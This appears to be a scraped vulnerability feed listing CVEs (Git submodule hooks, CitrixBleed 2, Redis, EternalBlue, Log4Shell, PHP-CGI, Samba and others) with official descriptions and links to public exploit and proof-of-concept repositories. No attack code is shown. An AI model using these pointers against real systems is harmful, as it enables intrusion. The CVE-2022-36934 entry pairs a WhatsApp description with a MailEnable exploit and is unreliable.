CVE-2025-48384
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Github link:
https://github.com/testdjshan/CVE-2025-48384
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Github link:
https://github.com/testdjshan/CVE-2025-48384
GitHub
GitHub - testdjshan/CVE-2025-48384: CVE-2025-48384
CVE-2025-48384. Contribute to testdjshan/CVE-2025-48384 development by creating an account on GitHub.
CVE-2024-3568
None
Github link:
https://github.com/rooobeam/Pickle-Deserialization-Exploit-in-Transformers
None
Github link:
https://github.com/rooobeam/Pickle-Deserialization-Exploit-in-Transformers
GitHub
GitHub - rooobeam/Pickle-Deserialization-Exploit-in-Transformers: This study analyzes Python pickle deserialization vulnerabilities…
This study analyzes Python pickle deserialization vulnerabilities, focusing on CVE-2024-3568 in Hugging Face Transformers' TFAutoModel. We reproduce the exploit to examine its root cause, a...
CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/bughuntar/CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/bughuntar/CVE-2025-5777
GitHub
GitHub - bughuntar/CVE-2025-5777: CVE-2025-5777 Citrix NetScaler Memory Leak Exploit (CitrixBleed 2)
CVE-2025-5777 Citrix NetScaler Memory Leak Exploit (CitrixBleed 2) - bughuntar/CVE-2025-5777
CVE-2025-32023
Redis is an open source, in-memory database that persists on disk. From 2.8 to before 8.0.3, 7.4.5, 7.2.10, and 6.2.19, an authenticated user may use a specially crafted string to trigger a stack/heap out of bounds write on hyperloglog operations, potentially leading to remote code execution. The bug likely affects all Redis versions with hyperloglog operations implemented. This vulnerability is fixed in 8.0.3, 7.4.5, 7.2.10, and 6.2.19. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing hyperloglog operations. This can be done using ACL to restrict HLL commands.
Github link:
https://github.com/atomicjjbod/CVE-2025-32023
Redis is an open source, in-memory database that persists on disk. From 2.8 to before 8.0.3, 7.4.5, 7.2.10, and 6.2.19, an authenticated user may use a specially crafted string to trigger a stack/heap out of bounds write on hyperloglog operations, potentially leading to remote code execution. The bug likely affects all Redis versions with hyperloglog operations implemented. This vulnerability is fixed in 8.0.3, 7.4.5, 7.2.10, and 6.2.19. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing hyperloglog operations. This can be done using ACL to restrict HLL commands.
Github link:
https://github.com/atomicjjbod/CVE-2025-32023
GitHub
GitHub - atomicjjbod/CVE-2025-32023: Exploit for CVE-2025-32023
Exploit for CVE-2025-32023. Contribute to atomicjjbod/CVE-2025-32023 development by creating an account on GitHub.
CVE-2017-0144
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
Github link:
https://github.com/AdityaBhatt3010/VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
Github link:
https://github.com/AdityaBhatt3010/VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint
GitHub
GitHub - AdityaBhatt3010/VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint: This report outlines a structured VAPT…
This report outlines a structured VAPT engagement focusing on PCI DSS compliance, SMB service enumeration, and exploitation of CVE-2017-0144 (EternalBlue) on a Windows 10 machine within a finance-o...
CVE-2021-44228
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Github link:
https://github.com/fabioeletto/hka-seminar-log4shell
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Github link:
https://github.com/fabioeletto/hka-seminar-log4shell
GitHub
GitHub - fabioeletto/hka-seminar-log4shell: Praktische Demonstration der Log4Shell-Sicherheitslücke (CVE-2021-44228)
Praktische Demonstration der Log4Shell-Sicherheitslücke (CVE-2021-44228) - fabioeletto/hka-seminar-log4shell
CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/0xgh057r3c0n/CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/0xgh057r3c0n/CVE-2025-5777
GitHub
GitHub - 0xgh057r3c0n/CVE-2025-5777: Citrix NetScaler Memory Leak PoC
Citrix NetScaler Memory Leak PoC. Contribute to 0xgh057r3c0n/CVE-2025-5777 development by creating an account on GitHub.
CVE-2022-36934
An integer overflow in WhatsApp could result in remote code execution in an established video call.
Github link:
https://github.com/Teexo/mailenable-cve-2022-36934
An integer overflow in WhatsApp could result in remote code execution in an established video call.
Github link:
https://github.com/Teexo/mailenable-cve-2022-36934
GitHub
GitHub - Teexo/mailenable-cve-2022-36934: Metasploit module for MailEnable CVE-2022-36934 authentication bypass RCE
Metasploit module for MailEnable CVE-2022-36934 authentication bypass RCE - Teexo/mailenable-cve-2022-36934
CVE-2024-32113
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
Github link:
https://github.com/guinea-offensive-security/Ofbiz-RCE
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
Github link:
https://github.com/guinea-offensive-security/Ofbiz-RCE
GitHub
GitHub - guinea-offensive-security/Ofbiz-RCE: CVE-2024-32113 & CVE-2024-38856
CVE-2024-32113 & CVE-2024-38856. Contribute to guinea-offensive-security/Ofbiz-RCE development by creating an account on GitHub.
CVE-2014-6287
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
Github link:
https://github.com/rahisec/rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
Github link:
https://github.com/rahisec/rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287
GitHub
GitHub - rahisec/rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287: This repository contains Detailed explanation and working…
This repository contains Detailed explanation and working poc for Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution. - rahisec/rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287
CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/Jishanluhar/CVE-2025-5777
Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Github link:
https://github.com/Jishanluhar/CVE-2025-5777
GitHub
GitHub - Jishanluhar/CVE-2025-5777: Explore the CVE-2025-5777 vulnerability in Citrix NetScaler. This script highlights a memory…
Explore the CVE-2025-5777 vulnerability in Citrix NetScaler. This script highlights a memory leak issue for educational purposes. 🐱💻🔍 - Jishanluhar/CVE-2025-5777
CVE-2025-48384
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Github link:
https://github.com/vinieger/vinieger-CVE-2025-48384-Dockerfile
Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Github link:
https://github.com/vinieger/vinieger-CVE-2025-48384-Dockerfile
GitHub
GitHub - vinieger/vinieger-CVE-2025-48384-Dockerfile: PoC dockerfile image for CVE-2025-48384
PoC dockerfile image for CVE-2025-48384. Contribute to vinieger/vinieger-CVE-2025-48384-Dockerfile development by creating an account on GitHub.
CVE-2024-4577
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Github link:
https://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Github link:
https://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
GitHub
GitHub - ZeroMemoryEx/PHP-CGI-INTERNAL-RCE: Delivering PHP RCE (CVE-2024-4577) to the Local Network Servers
Delivering PHP RCE (CVE-2024-4577) to the Local Network Servers - ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
CVE-2007-2447
The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Github link:
https://github.com/MrRoma577/exploit_cve-2007-2447_again
The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Github link:
https://github.com/MrRoma577/exploit_cve-2007-2447_again
GitHub
GitHub - MrRoma577/exploit_cve-2007-2447_again: just remeber how small mistake in santisize username could give yoy root access…
just remeber how small mistake in santisize username could give yoy root access to the full machine - GitHub - MrRoma577/exploit_cve-2007-2447_again: just remeber how small mistake in santisize us...